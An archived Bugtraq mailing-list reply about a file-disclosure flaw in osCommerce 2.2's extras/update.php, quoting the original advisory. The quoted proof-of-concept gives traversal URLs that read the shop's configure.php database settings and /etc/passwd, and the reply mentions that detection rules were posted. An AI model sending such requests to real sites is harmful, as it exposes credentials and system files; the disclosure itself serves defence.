RE: osCommerce "extras/" information/source code disclosure

To: <rgod@xxxxxxxxxxxxx>, <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: RE: osCommerce "extras/" information/source code disclosure
From: "Michael Scheidell" <scheidell@xxxxxxxxxx>
Date: Sat, 15 Apr 2006 08:39:14 -0400
Cc: <andiroo@xxxxxxxxx>
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Thread-index: AcZgLH8Fdn3KNt7tS/+eGYlFuWDC6wAXJY6Q
Thread-topic: osCommerce "extras/" information/source code disclosure

> -----Original Message-----
> From: rgod@xxxxxxxxxxxxx [mailto:rgod@xxxxxxxxxxxxx] 
> Sent: Friday, April 14, 2006 7:20 AM
> To: bugtraq@xxxxxxxxxxxxxxxxx
> Subject: osCommerce "extras/" information/source code disclosure
> 
> 
> ---- osCommerce <= 2.2 "extras/" information/source code 
> disclosure ------------
> 
> software site: http://www.oscommerce.com/
> 
> 
> if extras/ folder is placed inside the www path, you can see 
> all files on target system, including php source code with 
> database details, poc:
> 
http://[target]/[path]/extras/update.php?read_me=0&readme_file=../catalo
g/includes/configure.php
http://[target]/[path]/extras/update.php?read_me=0&readme_file=/etc/pass
wd


Amazing:  this was reported to oscommerce almost a year ago by andiroo
blat gmail, and they didn't do anything about it?

http://sourceforge.net/mailarchive/message.php?msg_id=12318248

http://www.oscommerce.com/community/bugs,2835

For you snorters, rules have been posted to snort-sigs and bleeding
mailing list.

Prev by Date: PHP Album <= 0.3.2.3 remote commnads execution
Next by Date: Tiny Web Gallery <= 1.4 XSS
Previous by thread: osCommerce "extras/" information/source code disclosure
Next by thread: Encyclopedia <= 3.0 (login.php) CrossSite Scripting - XSS
Index(es):
- Date
- Thread